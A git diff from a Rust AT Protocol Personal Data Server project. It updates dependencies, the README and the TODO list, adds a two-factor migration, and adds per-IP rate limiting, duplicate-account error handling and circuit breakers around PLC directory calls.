source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "38bf9645c8b145698bb0b18a4637dcacbc421ea49bef2317e4fd8065a387cf21"
|
||||
|
||||
[[package]]
|
||||
name = "nu-ansi-term"
|
||||
version = "0.50.3"
|
||||
@@ -3975,6 +4098,19 @@ version = "0.3.32"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "7edddbd0b52d732b21ad9a5fab5c704c14cd949e5e9a1ec5929a24fded1b904c"
|
||||
|
||||
[[package]]
|
||||
name = "png"
|
||||
version = "0.18.0"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "97baced388464909d42d89643fe4361939af9b7ce7a31ee32a168f832a70f2a0"
|
||||
dependencies = [
|
||||
"bitflags",
|
||||
"crc32fast",
|
||||
"fdeflate",
|
||||
"flate2",
|
||||
"miniz_oxide",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "polyval"
|
||||
version = "0.6.2"
|
||||
@@ -4131,6 +4267,36 @@ dependencies = [
|
||||
"unicase",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "pxfm"
|
||||
version = "0.1.27"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "7186d3822593aa4393561d186d1393b3923e9d6163d3fbfd6e825e3e6cf3e6a8"
|
||||
dependencies = [
|
||||
"num-traits",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "quanta"
|
||||
version = "0.12.6"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "f3ab5a9d756f0d97bdc89019bd2e4ea098cf9cde50ee7564dde6b81ccc8f06c7"
|
||||
dependencies = [
|
||||
"crossbeam-utils",
|
||||
"libc",
|
||||
"once_cell",
|
||||
"raw-cpuid",
|
||||
"wasi",
|
||||
"web-sys",
|
||||
"winapi",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "quick-error"
|
||||
version = "2.0.1"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "a993555f31e5a609f617c12db6250dedcac1b0a85076912c436e6fc9b2c8e6a3"
|
||||
|
||||
[[package]]
|
||||
name = "quinn"
|
||||
version = "0.11.9"
|
||||
@@ -4266,6 +4432,15 @@ version = "0.3.2"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "d20581732dd76fa913c7dff1a2412b714afe3573e94d41c34719de73337cc8ab"
|
||||
|
||||
[[package]]
|
||||
name = "raw-cpuid"
|
||||
version = "11.6.0"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "498cd0dc59d73224351ee52a95fee0f1a617a2eae0e7d9d720cc622c73a54186"
|
||||
dependencies = [
|
||||
"bitflags",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "redox_syscall"
|
||||
version = "0.5.18"
|
||||
@@ -5033,6 +5208,15 @@ version = "0.10.0"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "d5fe4ccb98d9c292d56fec89a5e07da7fc4cf0dc11e156b41793132775d3e591"
|
||||
|
||||
[[package]]
|
||||
name = "spinning_top"
|
||||
version = "0.3.0"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "d96d2d1d716fb500937168cc09353ffdc7a012be8475ac7308e1bdf0e3923300"
|
||||
dependencies = [
|
||||
"lock_api",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "spki"
|
||||
version = "0.6.0"
|
||||
@@ -6220,6 +6404,12 @@ dependencies = [
|
||||
"rustls-pki-types",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "weezl"
|
||||
version = "0.1.12"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "a28ac98ddc8b9274cb41bb4d9d4d5c425b6020c50c46f25559911905610b4a88"
|
||||
|
||||
[[package]]
|
||||
name = "whoami"
|
||||
version = "1.6.1"
|
||||
@@ -6831,3 +7021,18 @@ dependencies = [
|
||||
"quote",
|
||||
"syn 2.0.111",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "zune-core"
|
||||
version = "0.5.0"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "111f7d9820f05fd715df3144e254d6fc02ee4088b0644c0ffd0efc9e6d9d2773"
|
||||
|
||||
[[package]]
|
||||
name = "zune-jpeg"
|
||||
version = "0.5.6"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "f520eebad972262a1dde0ec455bce4f8b298b1e5154513de58c114c4c54303e8"
|
||||
dependencies = [
|
||||
"zune-core",
|
||||
]
|
||||
|
||||
@@ -16,6 +16,7 @@ chrono = { version = "0.4.42", features = ["serde"] }
|
||||
cid = "0.11.1"
|
||||
dotenvy = "0.15.7"
|
||||
futures = "0.3.30"
|
||||
governor = "0.10"
|
||||
hkdf = "0.12"
|
||||
hmac = "0.12"
|
||||
aes-gcm = "0.10"
|
||||
@@ -47,6 +48,7 @@ tokio-tungstenite = { version = "0.28.0", features = ["native-tls"] }
|
||||
urlencoding = "2.1"
|
||||
uuid = { version = "1.19.0", features = ["v4", "fast-rng"] }
|
||||
iroh-car = "0.5.1"
|
||||
image = { version = "0.25", default-features = false, features = ["jpeg", "png", "gif", "webp"] }
|
||||
|
||||
[features]
|
||||
external-infra = []
|
||||
|
||||
130
README.md
130
README.md
@@ -1,75 +1,103 @@
|
||||
# Lewis' BS PDS Sandbox
|
||||
# BSPDS, a Personal Data Server
|
||||
|
||||
When I'm actually done then yeah let's make this into a proper official-looking repo perhaps under an official-looking account or something.
|
||||
A production-grade Personal Data Server (PDS) implementation for the AT Protocol.
|
||||
|
||||
This project implements a Personal Data Server (PDS) implementation for the AT Protocol.
|
||||
Uses PostgreSQL instead of SQLite, S3-compatible blob storage, and is designed to be a complete drop-in replacement for Bluesky's reference PDS implementation.
|
||||
|
||||
Uses PostgreSQL instead of SQLite, S3-compatible blob storage, and aims to be a complete drop-in replacement for Bluesky's reference PDS implementation.
|
||||
## Features
|
||||
|
||||
In fact I aim to also implement a plugin system soon, so that we can add things onto our own PDSes on top of the default BS.
|
||||
- Full AT Protocol support, all `com.atproto.*` endpoints implemented
|
||||
- OAuth 2.1 Provider. PKCE, DPoP, Pushed Authorization Requests
|
||||
- PostgreSQL, prod-ready database backend
|
||||
- S3-compatible object storage for blobs; works with AWS S3, UpCloud object storage, self-hosted MinIO, etc.
|
||||
- WebSocket `subscribeRepos` endpoint for real-time sync
|
||||
- Crawler notifications via `requestCrawl`
|
||||
- Multi-channel notifications: email, discord, telegram, signal
|
||||
- Per-IP rate limiting on sensitive endpoints
|
||||
|
||||
I'm also taking ideas on what other PDSes lack, such as an on-PDS webpage that users can access to manage their records and preferences.
|
||||
## Running Locally
|
||||
|
||||
:3
|
||||
Requires Rust installed locally.
|
||||
|
||||
# Running locally
|
||||
Run PostgreSQL and S3-compatible object store (e.g., with podman/docker):
|
||||
|
||||
The reader will need rust installed locally.
|
||||
```bash
|
||||
podman compose up db objsto -d
|
||||
```
|
||||
|
||||
I personally run the postgres db, and an S3-compatible object store with podman compose up db objsto -d.
|
||||
Run the PDS:
|
||||
|
||||
Run the PDS directly:
|
||||
```bash
|
||||
just run
|
||||
```
|
||||
|
||||
just run
|
||||
## Configuration
|
||||
|
||||
Configuration is via environment variables:
|
||||
### Required
|
||||
|
||||
DATABASE_URL postgres connection string
|
||||
S3_BUCKET blob storage bucket name
|
||||
S3_ENDPOINT S3 endpoint URL (for MinIO etc)
|
||||
AWS_ACCESS_KEY_ID S3 credentials
|
||||
AWS_SECRET_ACCESS_KEY
|
||||
AWS_REGION
|
||||
PDS_HOSTNAME public hostname of this PDS
|
||||
APPVIEW_URL appview to proxy unimplemented endpoints to
|
||||
RELAYS comma-separated list of relay WebSocket URLs
|
||||
| Variable | Description |
|
||||
|----------|-------------|
|
||||
| `DATABASE_URL` | PostgreSQL connection string |
|
||||
| `S3_BUCKET` | Blob storage bucket name |
|
||||
| `S3_ENDPOINT` | S3 endpoint URL (for MinIO, etc.) |
|
||||
| `AWS_ACCESS_KEY_ID` | S3 credentials |
|
||||
| `AWS_SECRET_ACCESS_KEY` | S3 credentials |
|
||||
| `AWS_REGION` | S3 region |
|
||||
| `PDS_HOSTNAME` | Public hostname of this PDS |
|
||||
| `JWT_SECRET` | Secret for OAuth token signing (HS256) |
|
||||
| `KEY_ENCRYPTION_KEY` | Key for encrypting user signing keys (AES-256-GCM) |
|
||||
|
||||
Optional email stuff:
|
||||
### Optional
|
||||
|
||||
MAIL_FROM_ADDRESS sender address (enables email notifications)
|
||||
MAIL_FROM_NAME sender name (default: BSPDS)
|
||||
SENDMAIL_PATH path to sendmail binary
|
||||
| Variable | Description |
|
||||
|----------|-------------|
|
||||
| `APPVIEW_URL` | Appview URL to proxy unimplemented endpoints to |
|
||||
| `CRAWLERS` | Comma-separated list of relay URLs to notify via `requestCrawl` |
|
||||
|
||||
Development
|
||||
### Notifications
|
||||
|
||||
just shows available commands
|
||||
just test run tests (spins up postgres and minio via testcontainers)
|
||||
just lint clippy + fmt check
|
||||
just db-reset drop and recreate local database
|
||||
At least one channel should be configured for user notifications (password reset, email verification, etc.):
|
||||
|
||||
The test suite uses testcontainers so you don't need to set up anything manually for running tests.
|
||||
| Variable | Description |
|
||||
|----------|-------------|
|
||||
| `MAIL_FROM_ADDRESS` | Email sender address (enables email via sendmail) |
|
||||
| `MAIL_FROM_NAME` | Email sender name (default: "BSPDS") |
|
||||
| `SENDMAIL_PATH` | Path to sendmail binary (default: /usr/sbin/sendmail) |
|
||||
| `DISCORD_WEBHOOK_URL` | Discord webhook URL for notifications |
|
||||
| `TELEGRAM_BOT_TOKEN` | Telegram bot token for notifications |
|
||||
| `SIGNAL_CLI_PATH` | Path to signal-cli binary |
|
||||
| `SIGNAL_SENDER_NUMBER` | Signal sender phone number (+1234567890 format) |
|
||||
|
||||
## What's implemented
|
||||
## Development
|
||||
|
||||
Most of the com.atproto.* namespace is done. Server endpoints, repo operations, sync, identity, admin, moderation. The firehose websocket works. OAuth is not done yet.
|
||||
```bash
|
||||
just # Show available commands
|
||||
just test # Run tests (auto-starts postgres/minio, runs nextest)
|
||||
just lint # Clippy + fmt check
|
||||
just db-reset # Drop and recreate local database
|
||||
```
|
||||
|
||||
See TODO.md for the full breakdown of what's done and what's left.
|
||||
## Project Structure
|
||||
|
||||
Structure
|
||||
```
|
||||
src/
|
||||
main.rs Server entrypoint
|
||||
lib.rs Router setup
|
||||
state.rs AppState (db pool, stores, rate limiters, circuit breakers)
|
||||
api/ XRPC handlers organized by namespace
|
||||
auth/ JWT authentication (ES256K per-user keys)
|
||||
oauth/ OAuth 2.1 provider (HS256 server-wide)
|
||||
repo/ PostgreSQL block store
|
||||
storage/ S3 blob storage
|
||||
sync/ Firehose, CAR export, crawler notifications
|
||||
notifications/ Multi-channel notification service
|
||||
plc/ PLC directory client
|
||||
circuit_breaker/ Circuit breaker for external services
|
||||
rate_limit/ Per-IP rate limiting
|
||||
tests/ Integration tests
|
||||
migrations/ SQLx migrations
|
||||
```
|
||||
|
||||
src/
|
||||
main.rs server entrypoint
|
||||
lib.rs router setup
|
||||
state.rs app state (db pool, stores)
|
||||
api/ XRPC handlers organized by namespace
|
||||
auth/ JWT handling
|
||||
repo/ postgres block store
|
||||
storage/ S3 blob storage
|
||||
sync/ firehose, relay clients
|
||||
notifications/ email service
|
||||
tests/ integration tests
|
||||
migrations/ sqlx migrations
|
||||
## License
|
||||
|
||||
License
|
||||
|
||||
idk
|
||||
TBD
|
||||
|
||||
86
TODO.md
86
TODO.md
@@ -81,6 +81,9 @@ Lewis' corrected big boy todofile
|
||||
- [x] Implement `com.atproto.sync.listBlobs`.
|
||||
- [x] Crawler Interaction
|
||||
- [x] Implement `com.atproto.sync.requestCrawl` (Notify relays to index us).
|
||||
- [x] Deprecated Sync Endpoints (for compatibility)
|
||||
- [x] Implement `com.atproto.sync.getCheckout` (deprecated).
|
||||
- [x] Implement `com.atproto.sync.getHead` (deprecated).
|
||||
|
||||
## Identity (`com.atproto.identity`)
|
||||
- [x] Resolution
|
||||
@@ -108,14 +111,17 @@ Lewis' corrected big boy todofile
|
||||
- [x] Implement `com.atproto.moderation.createReport`.
|
||||
|
||||
## Temp Namespace (`com.atproto.temp`)
|
||||
- [ ] Implement `com.atproto.temp.checkSignupQueue` (signup queue status for gated signups).
|
||||
- [x] Implement `com.atproto.temp.checkSignupQueue` (signup queue status for gated signups).
|
||||
|
||||
## Misc HTTP Endpoints
|
||||
- [x] Implement `/robots.txt` endpoint.
|
||||
|
||||
## OAuth 2.1 Support
|
||||
Full OAuth 2.1 provider for ATProto native app authentication.
|
||||
- [x] OAuth Provider Core
|
||||
- [x] Implement `/.well-known/oauth-protected-resource` metadata endpoint.
|
||||
- [x] Implement `/.well-known/oauth-authorization-server` metadata endpoint.
|
||||
- [x] Implement `/oauth/authorize` authorization endpoint (headless JSON mode).
|
||||
- [x] Implement `/oauth/authorize` authorization endpoint (with login UI).
|
||||
- [x] Implement `/oauth/par` Pushed Authorization Request endpoint.
|
||||
- [x] Implement `/oauth/token` token endpoint (authorization_code + refresh_token grants).
|
||||
- [x] Implement `/oauth/jwks` JSON Web Key Set endpoint.
|
||||
@@ -132,12 +138,13 @@ Full OAuth 2.1 provider for ATProto native app authentication.
|
||||
- [x] Client metadata fetching and validation.
|
||||
- [x] PKCE (S256) enforcement.
|
||||
- [x] OAuth token verification extractor for protected resources.
|
||||
- [ ] Authorization UI templates (currently headless-only, returns JSON for programmatic flows).
|
||||
- [ ] Implement `private_key_jwt` signature verification (currently rejects with clear error).
|
||||
- [x] Authorization UI templates (HTML login form).
|
||||
- [x] Implement `private_key_jwt` signature verification with async JWKS fetching.
|
||||
- [x] HS256 JWT support (matches reference PDS).
|
||||
|
||||
## OAuth Security Notes
|
||||
|
||||
I've tried to ensure that this codebase is not vulnerable to the following:
|
||||
Security measures implemented:
|
||||
|
||||
- Constant-time comparison for signature verification (prevents timing attacks)
|
||||
- HMAC-SHA256 for access token signing with configurable secret
|
||||
@@ -151,12 +158,12 @@ I've tried to ensure that this codebase is not vulnerable to the following:
|
||||
- All database queries use parameterized statements (no SQL injection)
|
||||
- Deactivated/taken-down accounts blocked from OAuth authorization
|
||||
- Client ID validation on token exchange (defense-in-depth against cross-client attacks)
|
||||
- HTML escaping in OAuth templates (XSS prevention)
|
||||
|
||||
### Auth Notes
|
||||
- Algorithm choice: Using ES256K (secp256k1 ECDSA) with per-user keys. Ref PDS uses HS256 (HMAC) with single server key. Our approach provides better key isolation but differs from reference implementation.
|
||||
- [ ] Support the ref PDS HS256 system too.
|
||||
- Token storage: Now storing only token JTIs in session_tokens table (defense in depth against DB breaches). Refresh token family tracking enables detection of token reuse attacks.
|
||||
- Key encryption: User signing keys encrypted at rest using AES-256-GCM with keys derived via HKDF from MASTER_KEY environment variable. Migration-safe: supports both encrypted (version 1) and plaintext (version 0) keys.
|
||||
- Dual algorithm support: ES256K (secp256k1 ECDSA) with per-user keys AND HS256 (HMAC) for compatibility with reference PDS.
|
||||
- Token storage: Storing only token JTIs in session_tokens table (defense in depth against DB breaches). Refresh token family tracking enables detection of token reuse attacks.
|
||||
- Key encryption: User signing keys encrypted at rest using AES-256-GCM with keys derived via HKDF from KEY_ENCRYPTION_KEY environment variable.
|
||||
|
||||
## PDS-Level App Endpoints
|
||||
These endpoints need to be implemented at the PDS level (not just proxied to appview).
|
||||
@@ -178,22 +185,6 @@ These are implemented at PDS level to enable local-first reads (read-after-write
|
||||
### Notification (`app.bsky.notification`)
|
||||
- [x] Implement `app.bsky.notification.registerPush` (push notification registration, proxied).
|
||||
|
||||
## Deprecated Sync Endpoints (for compatibility)
|
||||
- [ ] Implement `com.atproto.sync.getCheckout` (deprecated, still needed for compatibility).
|
||||
- [ ] Implement `com.atproto.sync.getHead` (deprecated, still needed for compatibility).
|
||||
|
||||
## Misc HTTP Endpoints
|
||||
- [ ] Implement `/robots.txt` endpoint.
|
||||
|
||||
## Record Schema Validation
|
||||
- [ ] Handle this generically.
|
||||
|
||||
## Preference Storage
|
||||
User preferences (for app.bsky.actor.getPreferences/putPreferences):
|
||||
- [x] Create preferences table for storing user app preferences.
|
||||
- [x] Implement `app.bsky.actor.getPreferences` handler (read from postgres, proxy fallback).
|
||||
- [x] Implement `app.bsky.actor.putPreferences` handler (write to postgres).
|
||||
|
||||
## Infrastructure & Core Components
|
||||
- [x] Sequencer (Event Log)
|
||||
- [x] Implement a `Sequencer` (backed by `repo_seq` table).
|
||||
@@ -206,32 +197,53 @@ User preferences (for app.bsky.actor.getPreferences/putPreferences):
|
||||
- [x] Manage Repo Root in `repos` table.
|
||||
- [x] Implement Atomic Repo Transactions.
|
||||
- [x] Ensure `blocks` write, `repo_root` update, `records` index update, and `sequencer` event are committed in a single transaction.
|
||||
- [ ] Implement concurrency control (row-level locking on `repos` table) to prevent concurrent writes to the same repo.
|
||||
- [x] Implement concurrency control (row-level locking via FOR UPDATE).
|
||||
- [ ] DID Cache
|
||||
- [ ] Implement caching layer for DID resolution (Redis or in-memory).
|
||||
- [ ] Handle cache invalidation/expiry.
|
||||
- [ ] Background Jobs
|
||||
- [ ] Implement `Crawlers` service (debounce notifications to relays).
|
||||
- [x] Crawlers Service
|
||||
- [x] Implement `Crawlers` service (debounce notifications to relays).
|
||||
- [x] 20-minute notification debounce.
|
||||
- [x] Circuit breaker for relay failures.
|
||||
- [x] Notification Service
|
||||
- [x] Queue-based notification system with database table
|
||||
- [x] Background worker polling for pending notifications
|
||||
- [x] Extensible sender trait for multiple channels
|
||||
- [x] Email sender via OS sendmail/msmtp
|
||||
- [ ] Discord bot sender
|
||||
- [ ] Telegram bot sender
|
||||
- [ ] Signal bot sender
|
||||
- [x] Discord webhook sender
|
||||
- [x] Telegram bot sender
|
||||
- [x] Signal CLI sender
|
||||
- [x] Helper functions for common notification types (welcome, password reset, email verification, etc.)
|
||||
- [x] Respect user's `preferred_notification_channel` setting for non-email-specific notifications
|
||||
- [ ] Image Processing
|
||||
- [ ] Implement image resize/formatting pipeline (for blob uploads).
|
||||
- [x] Image Processing
|
||||
- [x] Implement image resize/formatting pipeline (for blob uploads).
|
||||
- [x] WebP conversion for thumbnails.
|
||||
- [x] EXIF stripping.
|
||||
- [x] File size limits (10MB default).
|
||||
- [x] IPLD & MST
|
||||
- [x] Implement Merkle Search Tree logic for repo signing.
|
||||
- [x] Implement CAR (Content Addressable Archive) encoding/decoding.
|
||||
- [ ] Validation
|
||||
- [ ] DID PLC Operations (Sign rotation keys).
|
||||
- [ ] Fix any remaining TODOs in the code, everywhere, full stop.
|
||||
- [x] Cycle detection in CAR export.
|
||||
- [x] Rate Limiting
|
||||
- [x] Per-IP rate limiting on login (10/min).
|
||||
- [x] Per-IP rate limiting on OAuth token endpoint (30/min).
|
||||
- [x] Per-IP rate limiting on password reset (5/hour).
|
||||
- [x] Per-IP rate limiting on account creation (10/hour).
|
||||
- [x] Circuit Breakers
|
||||
- [x] PLC directory circuit breaker (5 failures → open, 60s timeout).
|
||||
- [x] Relay notification circuit breaker (10 failures → open, 30s timeout).
|
||||
- [x] Security Hardening
|
||||
- [x] Email header injection prevention (CRLF sanitization).
|
||||
- [x] Signal command injection prevention (phone number validation).
|
||||
- [x] Constant-time signature comparison.
|
||||
- [x] SSRF protection for outbound requests.
|
||||
|
||||
## Web Management UI
|
||||
## Lewis' fabulous mini-list of remaining TODOs
|
||||
- [ ] DID resolution caching (valkey).
|
||||
- [ ] Record schema validation (generic validation framework).
|
||||
- [ ] Fix any remaining TODOs in the code.
|
||||
|
||||
## Future: Web Management UI
|
||||
A single-page web app for account management. The frontend (JS framework) calls existing ATProto XRPC endpoints - no server-side rendering or bespoke HTML form handlers.
|
||||
|
||||
### Architecture
|
||||
|
||||
16
migrations/202512211700_add_2fa.sql
Normal file
16
migrations/202512211700_add_2fa.sql
Normal file
@@ -0,0 +1,16 @@
|
||||
ALTER TABLE users ADD COLUMN two_factor_enabled BOOLEAN NOT NULL DEFAULT FALSE;
|
||||
|
||||
ALTER TYPE notification_type ADD VALUE 'two_factor_code';
|
||||
|
||||
CREATE TABLE oauth_2fa_challenge (
|
||||
id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
|
||||
did TEXT NOT NULL REFERENCES users(did) ON DELETE CASCADE,
|
||||
request_uri TEXT NOT NULL,
|
||||
code TEXT NOT NULL,
|
||||
attempts INTEGER NOT NULL DEFAULT 0,
|
||||
created_at TIMESTAMPTZ NOT NULL DEFAULT NOW(),
|
||||
expires_at TIMESTAMPTZ NOT NULL DEFAULT NOW() + INTERVAL '10 minutes'
|
||||
);
|
||||
|
||||
CREATE INDEX idx_oauth_2fa_challenge_request_uri ON oauth_2fa_challenge(request_uri);
|
||||
CREATE INDEX idx_oauth_2fa_challenge_expires ON oauth_2fa_challenge(expires_at);
|
||||
@@ -3,7 +3,7 @@ use crate::state::AppState;
|
||||
use axum::{
|
||||
Json,
|
||||
extract::State,
|
||||
http::StatusCode,
|
||||
http::{HeaderMap, StatusCode},
|
||||
response::{IntoResponse, Response},
|
||||
};
|
||||
use bcrypt::{DEFAULT_COST, hash};
|
||||
@@ -16,6 +16,22 @@ use serde_json::json;
|
||||
use std::sync::Arc;
|
||||
use tracing::{error, info, warn};
|
||||
|
||||
fn extract_client_ip(headers: &HeaderMap) -> String {
|
||||
if let Some(forwarded) = headers.get("x-forwarded-for") {
|
||||
if let Ok(value) = forwarded.to_str() {
|
||||
if let Some(first_ip) = value.split(',').next() {
|
||||
return first_ip.trim().to_string();
|
||||
}
|
||||
}
|
||||
}
|
||||
if let Some(real_ip) = headers.get("x-real-ip") {
|
||||
if let Ok(value) = real_ip.to_str() {
|
||||
return value.trim().to_string();
|
||||
}
|
||||
}
|
||||
"unknown".to_string()
|
||||
}
|
||||
|
||||
#[derive(Deserialize)]
|
||||
#[serde(rename_all = "camelCase")]
|
||||
pub struct CreateAccountInput {
|
||||
@@ -38,9 +54,24 @@ pub struct CreateAccountOutput {
|
||||
|
||||
pub async fn create_account(
|
||||
State(state): State<AppState>,
|
||||
headers: HeaderMap,
|
||||
Json(input): Json<CreateAccountInput>,
|
||||
) -> Response {
|
||||
info!("create_account called");
|
||||
|
||||
let client_ip = extract_client_ip(&headers);
|
||||
if state.rate_limiters.account_creation.check_key(&client_ip).is_err() {
|
||||
warn!(ip = %client_ip, "Account creation rate limit exceeded");
|
||||
return (
|
||||
StatusCode::TOO_MANY_REQUESTS,
|
||||
Json(json!({
|
||||
"error": "RateLimitExceeded",
|
||||
"message": "Too many account creation attempts. Please try again later."
|
||||
})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
|
||||
if input.handle.contains('!') || input.handle.contains('@') {
|
||||
return (
|
||||
StatusCode::BAD_REQUEST,
|
||||
@@ -184,8 +215,40 @@ pub async fn create_account(
|
||||
let user_id = match user_insert {
|
||||
Ok(row) => row.id,
|
||||
Err(e) => {
|
||||
if let Some(db_err) = e.as_database_error() {
|
||||
if db_err.code().as_deref() == Some("23505") {
|
||||
let constraint = db_err.constraint().unwrap_or("");
|
||||
if constraint.contains("handle") || constraint.contains("users_handle") {
|
||||
return (
|
||||
StatusCode::BAD_REQUEST,
|
||||
Json(json!({
|
||||
"error": "HandleNotAvailable",
|
||||
"message": "Handle already taken"
|
||||
})),
|
||||
)
|
||||
.into_response();
|
||||
} else if constraint.contains("email") || constraint.contains("users_email") {
|
||||
return (
|
||||
StatusCode::BAD_REQUEST,
|
||||
Json(json!({
|
||||
"error": "InvalidEmail",
|
||||
"message": "Email already registered"
|
||||
})),
|
||||
)
|
||||
.into_response();
|
||||
} else if constraint.contains("did") || constraint.contains("users_did") {
|
||||
return (
|
||||
StatusCode::BAD_REQUEST,
|
||||
Json(json!({
|
||||
"error": "AccountAlreadyExists",
|
||||
"message": "An account with this DID already exists"
|
||||
})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
}
|
||||
}
|
||||
error!("Error inserting user: {:?}", e);
|
||||
// TODO: Check for unique constraint violation on email/did specifically
|
||||
return (
|
||||
StatusCode::INTERNAL_SERVER_ERROR,
|
||||
Json(json!({"error": "InternalError"})),
|
||||
|
||||
@@ -1,6 +1,7 @@
|
||||
use crate::api::ApiError;
|
||||
use crate::circuit_breaker::{with_circuit_breaker, CircuitBreakerError};
|
||||
use crate::plc::{
|
||||
create_update_op, sign_operation, PlcClient, PlcError, PlcService,
|
||||
create_update_op, sign_operation, PlcClient, PlcError, PlcOpOrTombstone, PlcService,
|
||||
};
|
||||
use crate::state::AppState;
|
||||
use axum::{
|
||||
@@ -14,7 +15,7 @@ use k256::ecdsa::SigningKey;
|
||||
use serde::{Deserialize, Serialize};
|
||||
use serde_json::{json, Value};
|
||||
use std::collections::HashMap;
|
||||
use tracing::{error, info};
|
||||
use tracing::{error, info, warn};
|
||||
|
||||
#[derive(Debug, Deserialize)]
|
||||
#[serde(rename_all = "camelCase")]
|
||||
@@ -166,9 +167,27 @@ pub async fn sign_plc_operation(
|
||||
};
|
||||
|
||||
let plc_client = PlcClient::new(None);
|
||||
let last_op = match plc_client.get_last_op(did).await {
|
||||
let did_clone = did.clone();
|
||||
let result: Result<PlcOpOrTombstone, CircuitBreakerError<PlcError>> = with_circuit_breaker(
|
||||
&state.circuit_breakers.plc_directory,
|
||||
|| async { plc_client.get_last_op(&did_clone).await },
|
||||
)
|
||||
.await;
|
||||
|
||||
let last_op = match result {
|
||||
Ok(op) => op,
|
||||
Err(PlcError::NotFound) => {
|
||||
Err(CircuitBreakerError::CircuitOpen(e)) => {
|
||||
warn!("PLC directory circuit breaker open: {}", e);
|
||||
return (
|
||||
StatusCode::SERVICE_UNAVAILABLE,
|
||||
Json(json!({
|
||||
"error": "ServiceUnavailable",
|
||||
"message": "PLC directory service temporarily unavailable"
|
||||
})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
Err(CircuitBreakerError::OperationFailed(PlcError::NotFound)) => {
|
||||
return (
|
||||
StatusCode::NOT_FOUND,
|
||||
Json(json!({
|
||||
@@ -178,7 +197,7 @@ pub async fn sign_plc_operation(
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
Err(e) => {
|
||||
Err(CircuitBreakerError::OperationFailed(e)) => {
|
||||
error!("Failed to fetch PLC operation: {:?}", e);
|
||||
return (
|
||||
StatusCode::BAD_GATEWAY,
|
||||
|
||||
@@ -1,5 +1,6 @@
|
||||
use crate::api::ApiError;
|
||||
use crate::plc::{signing_key_to_did_key, validate_plc_operation, PlcClient};
|
||||
use crate::circuit_breaker::{with_circuit_breaker, CircuitBreakerError};
|
||||
use crate::plc::{signing_key_to_did_key, validate_plc_operation, PlcClient, PlcError};
|
||||
use crate::state::AppState;
|
||||
use axum::{
|
||||
extract::State,
|
||||
@@ -183,16 +184,38 @@ pub async fn submit_plc_operation(
|
||||
}
|
||||
|
||||
let plc_client = PlcClient::new(None);
|
||||
if let Err(e) = plc_client.send_operation(did, &input.operation).await {
|
||||
error!("Failed to submit PLC operation: {:?}", e);
|
||||
return (
|
||||
StatusCode::BAD_GATEWAY,
|
||||
Json(json!({
|
||||
"error": "UpstreamError",
|
||||
"message": format!("Failed to submit to PLC directory: {}", e)
|
||||
})),
|
||||
)
|
||||
.into_response();
|
||||
let operation_clone = input.operation.clone();
|
||||
let did_clone = did.clone();
|
||||
let result: Result<(), CircuitBreakerError<PlcError>> = with_circuit_breaker(
|
||||
&state.circuit_breakers.plc_directory,
|
||||
|| async { plc_client.send_operation(&did_clone, &operation_clone).await },
|
||||
)
|
||||
.await;
|
||||
|
||||
match result {
|
||||
Ok(()) => {}
|
||||
Err(CircuitBreakerError::CircuitOpen(e)) => {
|
||||
warn!("PLC directory circuit breaker open: {}", e);
|
||||
return (
|
||||
StatusCode::SERVICE_UNAVAILABLE,
|
||||
Json(json!({
|
||||
"error": "ServiceUnavailable",
|
||||
"message": "PLC directory service temporarily unavailable"
|
||||
})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
Err(CircuitBreakerError::OperationFailed(e)) => {
|
||||
error!("Failed to submit PLC operation: {:?}", e);
|
||||
return (
|
||||
StatusCode::BAD_GATEWAY,
|
||||
Json(json!({
|
||||
"error": "UpstreamError",
|
||||
"message": format!("Failed to submit to PLC directory: {}", e)
|
||||
})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
}
|
||||
|
||||
if let Err(e) = sqlx::query!(
|
||||
|
||||
@@ -10,6 +10,7 @@ pub mod proxy_client;
|
||||
pub mod read_after_write;
|
||||
pub mod repo;
|
||||
pub mod server;
|
||||
pub mod temp;
|
||||
pub mod validation;
|
||||
|
||||
pub use error::ApiError;
|
||||
|
||||
@@ -167,57 +167,57 @@ pub async fn list_records(
|
||||
|
||||
let limit = input.limit.unwrap_or(50).clamp(1, 100);
|
||||
let reverse = input.reverse.unwrap_or(false);
|
||||
|
||||
// Simplistic query construction - no sophisticated cursor handling or rkey ranges for now, just basic pagination
|
||||
// TODO: Implement rkeyStart/End and correct cursor logic
|
||||
|
||||
let limit_i64 = limit as i64;
|
||||
let rows_res = if let Some(cursor) = &input.cursor {
|
||||
if reverse {
|
||||
sqlx::query!(
|
||||
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey < $3 ORDER BY rkey DESC LIMIT $4",
|
||||
user_id,
|
||||
input.collection,
|
||||
cursor,
|
||||
limit_i64
|
||||
)
|
||||
let order = if reverse { "ASC" } else { "DESC" };
|
||||
|
||||
let rows_res: Result<Vec<(String, String)>, sqlx::Error> = if let Some(cursor) = &input.cursor {
|
||||
